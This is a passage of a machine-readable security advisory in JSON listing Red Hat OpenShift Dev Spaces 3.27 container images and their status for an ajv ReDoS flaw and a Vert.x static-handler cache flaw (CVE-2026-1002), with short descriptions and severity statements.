"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ajv: ReDoS via $data reference"
},
{
"cve": "CVE-2026-1002",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2026-01-15T21:03:20.088599+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2430180"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vert.x. The Web static handler component cache can be manipulated to deny the access to static files served by the handler using specifically crafted request URIs, preventing legitimate users from accessing static files with an HTTP 404 response.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "io.vertx/vertx-core: static handler component cache can be manipulated to deny the access to static files",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability allows a remote attacker to block access to specific static files, such as images, CSS or HTML files. However, the underlying Vert.x server, the API endpoints and other non-cached resources are not affected. Due to this reason, this issue has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
